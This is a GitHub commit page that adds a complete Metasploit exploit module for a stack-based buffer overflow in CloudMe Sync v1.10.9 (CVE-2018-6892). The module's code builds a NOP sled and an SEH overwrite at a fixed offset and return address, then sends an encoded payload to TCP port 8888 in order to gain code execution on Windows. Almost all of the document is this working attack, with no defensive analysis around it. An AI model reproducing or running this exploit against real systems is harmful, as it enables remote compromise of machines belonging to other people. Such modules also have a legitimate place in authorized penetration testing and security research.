Skip to content

Commit 745ad4d

Browse files
CloudMe Sync Client BoF
1 parent ff3b318 commit 745ad4d

File tree

1 file changed

+69
-0
lines changed

1 file changed

+69
-0
lines changed
Lines changed: 69 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,69 @@
1+
##
2+
# This module requires Metasploit: https://metasploit.com/download
3+
# Current source: https://github.com/rapid7/metasploit-framework
4+
##
5+
6+
class MetasploitModule < Msf::Exploit::Remote
7+
Rank = GreatRanking
8+
9+
include Msf::Exploit::Remote::Tcp
10+
include Msf::Exploit::Remote::Seh
11+
12+
def initialize(info = {})
13+
super(update_info(info,
14+
'Name' => 'CloudMe Sync v1.10.9',
15+
'Description' => %q{
16+
This module exploits a stack-based buffer overflow vulnerability
17+
in CloudMe Sync v1.10.9 client application. This module has been
18+
tested successfully on Windows 7 SP1 x86.
19+
},
20+
'License' => MSF_LICENSE,
21+
'Author' =>
22+
[
23+
'hyp3rlinx', # Original exploit author
24+
'Daniel Teixeira' # MSF module author
25+
],
26+
'References' =>
27+
[
28+
[ 'CVE', '2018-6892'],
29+
[ 'EDB', '44027' ],
30+
],
31+
'DefaultOptions' =>
32+
{
33+
'EXITFUNC' => 'thread'
34+
},
35+
'Platform' => 'win',
36+
'Payload' =>
37+
{
38+
'BadChars' => "\x00",
39+
},
40+
'Targets' =>
41+
[
42+
[ 'CloudMe Sync v1.10.9',
43+
{
44+
'Offset' => 2232,
45+
'Ret' => 0x61e7b7f6
46+
}
47+
]
48+
],
49+
'Privileged' => true,
50+
'DisclosureDate' => 'Jan 17 2018',
51+
'DefaultTarget' => 0))
52+
53+
register_options([Opt::RPORT(8888)])
54+
55+
end
56+
57+
def exploit
58+
connect
59+
60+
buffer = make_nops(target['Offset'])
61+
buffer << generate_seh_record(target.ret)
62+
buffer << make_nops(10)
63+
buffer << payload.encoded
64+
buffer << make_nops(5600)
65+
66+
sock.put(buffer)
67+
handler
68+
end
69+
end

0 commit comments

Comments
 (0)